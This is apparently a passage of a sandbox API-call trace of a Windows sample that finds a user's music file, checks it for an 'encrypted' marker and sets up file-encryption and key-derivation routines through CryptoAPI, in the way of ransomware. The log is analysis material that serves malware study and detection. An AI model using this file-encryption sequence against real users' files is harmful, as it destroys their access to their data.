(in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.255] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.255] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.255] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa571aff0, ftCreationTime.dwHighDateTime=0x1d5ba57, ftLastAccessTime.dwLowDateTime=0x2c45c810, ftLastAccessTime.dwHighDateTime=0x1d5c5b9, ftLastWriteTime.dwLowDateTime=0x2c45c810, ftLastWriteTime.dwHighDateTime=0x1d5c5b9, nFileSizeHigh=0x0, nFileSizeLow=0x17317, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3lV09D8.m4a", cAlternateFileName="")) returned 0x7c20c0 [0037.256] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0037.256] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.256] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa571aff0, ftCreationTime.dwHighDateTime=0x1d5ba57, ftLastAccessTime.dwLowDateTime=0x2c45c810, ftLastAccessTime.dwHighDateTime=0x1d5c5b9, ftLastWriteTime.dwLowDateTime=0x2c45c810, ftLastWriteTime.dwHighDateTime=0x1d5c5b9, nFileSizeHigh=0x0, nFileSizeLow=0x17317, dwReserved0=0x0, dwReserved1=0x777648, cFileName="3lV09D8.m4a", cAlternateFileName="")) returned 0x7c20c0 [0037.256] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0037.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0037.256] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0037.256] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.256] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lV09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="V09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0037.257] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="09D8.m4a\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0037.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0037.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.257] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.258] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.258] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.258] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.258] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.258] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0037.258] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.258] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.258] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.258] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.259] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0037.259] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.259] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\3lV09D8.m4a", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa571aff0, ftCreationTime.dwHighDateTime=0x1d5ba57, ftLastAccessTime.dwLowDateTime=0x2c45c810, ftLastAccessTime.dwHighDateTime=0x1d5c5b9, ftLastWriteTime.dwLowDateTime=0x2c45c810, ftLastWriteTime.dwHighDateTime=0x1d5c5b9, nFileSizeHigh=0x0, nFileSizeLow=0x17317, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="3lV09D8.m4a", cAlternateFileName="")) returned 0x7c2240 [0037.259] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0037.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7a8 | out: hHeap=0x770000) returned 1 [0037.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0037.259] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.260] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.260] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.260] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.260] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.260] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0037.260] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.260] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.260] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.260] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.260] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.260] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.260] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.261] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0037.261] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.261] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.261] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.261] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0037.261] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0037.261] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0037.261] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0037.262] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.262] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.262] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.262] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.262] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0037.262] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0037.263] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.263] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.263] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.263] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0037.263] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.263] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0037.263] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.263] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.263] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.263] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.263] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.263] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0037.263] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 